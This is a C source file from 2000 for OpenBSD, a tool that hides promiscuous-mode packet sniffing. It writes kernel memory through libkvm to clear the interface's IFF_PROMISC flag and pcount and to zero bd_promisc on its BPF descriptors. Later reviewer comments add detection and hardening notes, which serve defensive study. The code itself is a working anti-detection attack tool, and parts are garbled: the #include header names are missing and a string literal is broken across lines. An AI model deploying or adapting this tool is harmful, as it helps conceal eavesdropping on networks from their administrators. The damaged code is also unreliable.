/*
 * Name: Promisc Mode Obscurity via kvm
 * Date: May 23 03:46:51 2000
 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
 *
 * SoftProject Digital Security for Y2K
 * Sikurezza.org Italian Security Mailing List
 *
 * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
 * Poul-Henning Kamp but you can give me in return a coffee.
 *
 * Tested on: OpenBSD 2.6 kern#0 i386
 *
 * cc obsd_obscura.c -lkvm
 */

/*
 * Reviewer summary of what the code below does:
 *   - opens kernel memory read-write through libkvm (kvm_open, O_RDWR);
 *   - resolves the _ifnet symbol and walks the interface list it heads;
 *   - for the interface named in argv[1], clears IFF_PROMISC in if_flags,
 *     zeroes if_pcount, and writes the whole struct ifnet copy back;
 *   - walks that interface's BPF descriptor list and zeroes bd_promisc on
 *     every descriptor that had it set.
 *
 * Detection and hardening notes:
 *   - After these writes, a check that relies only on the interface flag
 *     (for example the PROMISC flag shown by ifconfig) no longer reflects
 *     whether a listener asked for promiscuous mode.
 *   - Nothing in this file unlinks a listener: descriptors stay on
 *     bif_dlist, so enumerating processes that hold bpf devices open
 *     (e.g. with fstat(1)) is not affected by anything done here.
 *   - No driver or ioctl path is called, so the NIC's receive filter is
 *     presumably left as it was -- confirm on the target kernel.
 *   - The technique depends on a writable kernel-memory handle. On
 *     OpenBSD, securelevel 1 and above makes /dev/mem and /dev/kmem
 *     non-writable, which removes this write path.
 */

/*
 * NOTE(review): the header names that followed each #include were lost
 * when this page was captured; ten bare directives remain.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * Print-and-exit helper built on errx().
 * NOTE(review): the expansion ends in ';', so `Error(...);` yields an
 * extra empty statement and cannot be used directly before an `else`.
 * x is passed as the errx() format string; every call site in this file
 * passes a string literal.
 */
#define Error(x) errx(EX_UNAVAILABLE, x);

/* Symbol table for kvm_nlist(): only the interface list head is resolved. */
struct nlist list[] = { {"_ifnet"}, {NULL} };

/*
 * Print the banner and a usage line, then exit.
 *
 * arg: program name (main passes argv[0]).
 *
 * NOTE(review): the usage format is "%s \n"; since main requires exactly
 * one argument and compares it with if_xname, an interface-name
 * placeholder was probably lost from this string in capture.
 * Exits with status 0 even though it is reached on a usage error.
 */
void usage(char *arg)
{
    printf(
        "OpenBSD - Promisc Total Obscurity\n"
        "---------------------------------\n\n"
        "Coded By pIGpEN / s0FtPj Y2k\n\n");
    printf("%s \n", arg);
    exit(0);
}

/*
 * Walk the BPF descriptor list of one interface in kernel memory and clear
 * bd_promisc on every descriptor that has it set.
 *
 * kd:  kvm handle; must allow writes for kvm_write() to succeed.
 * ifp: userland copy of the struct ifnet (main passes &ifc); its if_bpf
 *      member is used as a kernel address.
 *
 * Prints one line per descriptor. Descriptors are modified in place but
 * never removed from the list.
 *
 * NOTE(review): no kvm_read()/kvm_write() return value is checked; after a
 * failed read, ibpf/dbpf hold indeterminate data and the loop would follow
 * pointers taken from it.
 */
void bpf_zero(kvm_t *kd, struct ifnet *ifp)
{
    struct bpf_if ibpf;
    struct bpf_d dbpf, *pdbpf;
    int count = 0;

    /* Copy the per-interface BPF state out of kernel memory. */
    kvm_read(kd, (u_long) ifp->if_bpf, &ibpf, sizeof ibpf);

    /* pdbpf is a kernel address; dbpf is the local copy it is read into. */
    for(pdbpf = ibpf.bif_dlist; pdbpf; pdbpf = dbpf.bd_next) {
        kvm_read(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);

        printf("#%d listener has %s promisc mode enabled", ++count,
               (!dbpf.bd_promisc) ? "no " : " ");

        if(dbpf.bd_promisc) {
            printf(" (changed)");
            dbpf.bd_promisc = 0;
            /*
             * The whole descriptor copy is written back, not just the
             * one field, so any kernel update made to this descriptor
             * between the read and the write is overwritten.
             */
            kvm_write(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
        }

        putchar('\n');
    }
}

/*
 * Entry point. Expects exactly one argument, compared against if_xname of
 * each interface found through the _ifnet list head.
 *
 * Returns 0 after the walk; exits via Error()/usage() on setup failures.
 *
 * NOTE(review): kvm_read()/kvm_write() results are not checked here
 * either, and the loop advances using fields of the copy just read.
 */
int main(int argc, char **argv)
{
    kvm_t *kd;
    struct ifnet_head ifh;
    struct ifnet ifc, *ifp;

    if(argc != 2)
        usage(argv[0]);

    /*
     * NULL file arguments select the running system (see kvm_open(3));
     * O_RDWR is what makes the later kvm_write() calls possible.
     */
    if(!(kd=kvm_open(NULL, NULL, NULL, O_RDWR, argv[0])))
        Error("kvm_open()");

    if(kvm_nlist(kd, list) == -1)
        Error("kvm_nlist()");

    /* A zero n_value means the symbol was not resolved. */
    if(!list[0].n_value)
        Error("checking n_value");

    kvm_read(kd, list[0].n_value, &ifh, sizeof ifh);

    /* ifp is a kernel address; ifc is the local copy of that interface. */
    for(ifp = ifh.tqh_first; ifp; ifp = ifc.if_list.tqe_next) {
        kvm_read(kd, (u_long) ifp, &ifc, sizeof ifc);

        if(!strcmp(argv[1], ifc.if_xname)) {
            /*
             * NOTE(review): this string literal is split across two
             * lines in the page as captured; it is kept as found.
             */
            printf("%s found ... 
promisc mode ", ifc.if_xname);

            if(ifc.if_flags & IFF_PROMISC) {
                printf("(found)\n");

                /*
                 * Only the if_pcount reset is guarded by this if; the
                 * statements after it run whenever IFF_PROMISC was set.
                 */
                if(ifc.if_pcount)
                    /* Like in FreeBSD version, you can do a
                     * perfect thing by decreasing for each
                     * descriptor found */
                    ifc.if_pcount = 0;
                ifc.if_flags &= ~IFF_PROMISC;

                /*
                 * The full struct ifnet copy is written back over the
                 * live kernel object, so every field carries the value
                 * it had at read time, not only the two changed above.
                 */
                kvm_write(kd, (u_long) ifp, &ifc, sizeof ifc);

                printf("BPF Analysis for %s interface\n", ifc.if_xname);
                bpf_zero(kd, &ifc);
            }else
                printf("(not found)\n");
        }else
            printf("skipping -> %s\n", ifc.if_xname);
    }

    kvm_close(kd);
    return 0;
}